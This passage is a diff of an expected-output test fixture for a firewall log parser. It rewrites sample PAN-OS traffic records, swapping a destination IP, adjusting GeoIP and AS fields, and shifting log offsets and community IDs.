         "event.outcome": "success",
         "event.start": "2018-11-30T16:08:57.000-02:00",
         "event.timezone": "-02:00",
@@ -2359,12 +2303,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 9763,
+        "log.offset": 9883,
         "network.application": "dns",
         "network.bytes": 261,
         "network.community_id": [
-            "1:9T+RKr8xDB21pvAf/Fihyq72sLY=",
-            "1:URR/wC9NPuHbnjGQ1Y7LffVYlTc="
+            "1:FlksUdaebhTer2TPcpfwCUq7loY=",
+            "1:NSA2qdITGuu6//2R09CwIX3i8FE="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -2381,12 +2325,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24173",
-        "panw.panos.network.nat.community_id": "1:9T+RKr8xDB21pvAf/Fihyq72sLY=",
+        "panw.panos.network.nat.community_id": "1:NSA2qdITGuu6//2R09CwIX3i8FE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091133,
         "panw.panos.source.interface": "ethernet1/2",
@@ -2401,14 +2345,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.207",
-            "8.8.8.8"
+            "192.168.15.207"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 179,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -2434,17 +2378,7 @@
         "client.packets": 13,
         "client.port": 52454,
         "destination.address": "54.84.80.198",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 4537,
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.84.80.198",
         "destination.nat.ip": "54.84.80.198",
         "destination.nat.port": 443,
@@ -2472,7 +2406,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 10212,
+        "log.offset": 10342,
         "network.application": "traps-management-service",
         "network.bytes": 6295,
         "network.community_id": [
@@ -2548,14 +2482,6 @@
         "client.port": 52445,
         "destination.address": "199.167.55.52",
         "destination.bytes": 0,
-        "destination.geo.city_name": "Sunnyvale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.386,
-        "destination.geo.location.lon": -122.0144,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "199.167.55.52",
         "destination.nat.ip": "199.167.55.52",
         "destination.nat.port": 4282,
@@ -2583,7 +2509,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 10725,
+        "log.offset": 10855,
         "network.application": "incomplete",
         "network.bytes": 624,
         "network.community_id": [
@@ -2657,17 +2583,18 @@
         "client.nat.port": 0,
         "client.packets": 6,
         "client.port": 0,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 588,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 0,
         "destination.packets": 6,
         "destination.port": 0,
@@ -2681,7 +2608,7 @@
         "event.end": "2018-11-30T16:09:19.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:19.000-02:00",
         "event.timezone": "-02:00",
@@ -2693,12 +2620,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 11198,
+        "log.offset": 11328,
         "network.application": "ping",
         "network.bytes": 1176,
         "network.community_id": [
-            "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
-            "1:iNhLzwoKKarTKCq59Sts/hhZN7Q="
+            "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
+            "1:P75WlJ7hfYMGDrg11tgcwQhxoAI="
         ],
         "network.direction": "outbound",
         "network.packets": 12,
@@ -2715,12 +2642,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 0,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24242",
-        "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
+        "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091136,
         "panw.panos.source.interface": "ethernet1/2",
@@ -2735,14 +2662,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 588,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 0,
         "server.packets": 6,
         "server.port": 0,
@@ -2767,17 +2694,18 @@
         "client.nat.port": 33110,
         "client.packets": 1,
         "client.port": 35485,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 130,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -2790,7 +2718,7 @@
         "event.end": "2018-11-30T16:09:02.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:02.000-02:00",
         "event.timezone": "-02:00",
@@ -2800,12 +2728,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 11643,
+        "log.offset": 11783,
         "network.application": "dns",
         "network.bytes": 215,
         "network.community_id": [
-            "1:JM1EdN05nKTy8Sq9WGpY15fCNJk=",
-            "1:XjmNQR0k4Z9rGS6dXH+3mvmrqzA="
+            "1:oGfTGYDsAux8eMBCoBff8uxez9M=",
+            "1:vRrHCKzYF5Vw0mmasFYnIzPK2V4="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -2822,12 +2750,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24190",
-        "panw.panos.network.nat.community_id": "1:JM1EdN05nKTy8Sq9WGpY15fCNJk=",
+        "panw.panos.network.nat.community_id": "1:oGfTGYDsAux8eMBCoBff8uxez9M=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091137,
         "panw.panos.source.interface": "ethernet1/2",
@@ -2841,14 +2769,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.210",
-            "8.8.8.8"
+            "192.168.15.210"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 130,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -2874,14 +2802,7 @@
         "client.packets": 6,
         "client.port": 62730,
         "destination.address": "172.217.9.142",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 1991,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.9.142",
         "destination.nat.ip": "172.217.9.142",
         "destination.nat.port": 443,
@@ -2906,7 +2827,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 12089,
+        "log.offset": 12239,
         "network.application": "quic",
         "network.bytes": 4867,
         "network.community_id": [
@@ -2981,14 +2902,7 @@
         "client.packets": 8,
         "client.port": 52506,
         "destination.address": "151.101.2.2",
-        "destination.as.number": 54113,
-        "destination.as.organization.name": "Fastly",
         "destination.bytes": 523,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "151.101.2.2",
         "destination.nat.ip": "151.101.2.2",
         "destination.nat.port": 443,
@@ -3016,7 +2930,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 12559,
+        "log.offset": 12709,
         "network.application": "ssl",
         "network.bytes": 1623,
         "network.community_id": [
@@ -3091,17 +3005,7 @@
         "client.packets": 5,
         "client.port": 60596,
         "destination.address": "216.58.194.66",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 2428,
-        "destination.geo.city_name": "Mountain View",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.3861,
-        "destination.geo.location.lon": -122.0839,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "216.58.194.66",
         "destination.nat.ip": "216.58.194.66",
         "destination.nat.port": 443,
@@ -3129,7 +3033,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 13050,
+        "log.offset": 13200,
         "network.application": "quic",
         "network.bytes": 4405,
         "network.community_id": [
@@ -3203,17 +3107,18 @@
         "client.nat.port": 0,
         "client.packets": 6,
         "client.port": 0,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 588,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 0,
         "destination.packets": 6,
         "destination.port": 0,
@@ -3227,7 +3132,7 @@
         "event.end": "2018-11-30T16:09:25.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:25.000-02:00",
         "event.timezone": "-02:00",
@@ -3239,12 +3144,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 13518,
+        "log.offset": 13668,
         "network.application": "ping",
         "network.bytes": 1176,
         "network.community_id": [
-            "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
-            "1:iNhLzwoKKarTKCq59Sts/hhZN7Q="
+            "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
+            "1:P75WlJ7hfYMGDrg11tgcwQhxoAI="
         ],
         "network.direction": "outbound",
         "network.packets": 12,
@@ -3261,12 +3166,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 0,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24328",
-        "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
+        "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091141,
         "panw.panos.source.interface": "ethernet1/2",
@@ -3281,14 +3186,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 588,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 0,
         "server.packets": 6,
         "server.port": 0,
@@ -3313,17 +3218,18 @@
         "client.nat.port": 0,
         "client.packets": 2,
         "client.port": 0,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 196,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 0,
         "destination.packets": 2,
         "destination.port": 0,
@@ -3337,7 +3243,7 @@
         "event.end": "2018-11-30T16:09:25.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:25.000-02:00",
         "event.timezone": "-02:00",
@@ -3349,12 +3255,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 13962,
+        "log.offset": 14122,
         "network.application": "ping",
         "network.bytes": 392,
         "network.community_id": [
-            "1:7LdGPOlsucPADJQxcTlIy8FSIxU=",
-            "1:QVXHpdoObbzEeqP6DGULYxqYgAY="
+            "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
+            "1:OluRae/1XXdteWCnzDY1tWknrF0="
         ],
         "network.direction": "outbound",
         "network.packets": 4,
@@ -3371,12 +3277,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 0,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24385",
-        "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
+        "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091142,
         "panw.panos.source.interface": "ethernet1/2",
@@ -3391,14 +3297,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.210",
-            "8.8.8.8"
+            "192.168.15.210"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 196,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 0,
         "server.packets": 2,
         "server.port": 0,
@@ -3424,14 +3330,7 @@
         "client.packets": 12,
         "client.port": 52514,
         "destination.address": "184.51.253.193",
-        "destination.as.number": 16625,
-        "destination.as.organization.name": "Akamai Technologies, Inc.",
         "destination.bytes": 5003,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "184.51.253.193",
         "destination.nat.ip": "184.51.253.193",
         "destination.nat.port": 443,
@@ -3459,7 +3358,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 14404,
+        "log.offset": 14574,
         "network.application": "ssl",
         "network.bytes": 7231,
         "network.community_id": [
@@ -3533,17 +3432,18 @@
         "client.nat.port": 51374,
         "client.packets": 1,
         "client.port": 55155,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 171,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -3557,7 +3457,7 @@
         "event.end": "2018-11-30T16:09:08.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:08.000-02:00",
         "event.timezone": "-02:00",
@@ -3569,12 +3469,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 14890,
+        "log.offset": 15060,
         "network.application": "dns",
         "network.bytes": 267,
         "network.community_id": [
-            "1:BengLCKQRlHSjje1eFQLdxgTKJc=",
-            "1:QjiWUuclXv+JzWhbuYDyyP+YyTk="
+            "1:QvcLIBQ/llZfAEhjuMmKr/RH930=",
+            "1:Y+f0oZmTdWUv5nZ7tWfD0Hvy1No="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -3591,12 +3491,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24131",
-        "panw.panos.network.nat.community_id": "1:QjiWUuclXv+JzWhbuYDyyP+YyTk=",
+        "panw.panos.network.nat.community_id": "1:Y+f0oZmTdWUv5nZ7tWfD0Hvy1No=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091144,
         "panw.panos.source.interface": "ethernet1/2",
@@ -3611,14 +3511,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 171,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -3645,14 +3545,6 @@
         "client.port": 52445,
         "destination.address": "199.167.55.52",
         "destination.bytes": 0,
-        "destination.geo.city_name": "Sunnyvale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.386,
-        "destination.geo.location.lon": -122.0144,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "199.167.55.52",
         "destination.nat.ip": "199.167.55.52",
         "destination.nat.port": 4282,
@@ -3680,7 +3572,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 15339,
+        "log.offset": 15519,
         "network.application": "incomplete",
         "network.bytes": 78,
         "network.community_id": [
@@ -3755,17 +3647,7 @@
         "client.packets": 11,
         "client.port": 52516,
         "destination.address": "199.167.52.219",
-        "destination.as.number": 54538,
-        "destination.as.organization.name": "PALO ALTO NETWORKS",
         "destination.bytes": 2316,
-        "destination.geo.city_name": "Sunnyvale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.386,
-        "destination.geo.location.lon": -122.0144,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "199.167.52.219",
         "destination.nat.ip": "199.167.52.219",
         "destination.nat.port": 17472,
@@ -3793,7 +3675,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 15808,
+        "log.offset": 15988,
         "network.application": "tanium",
         "network.bytes": 3402,
         "network.community_id": [
@@ -3868,17 +3750,7 @@
         "client.packets": 19,
         "client.port": 52511,
         "destination.address": "52.71.117.196",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 13966,
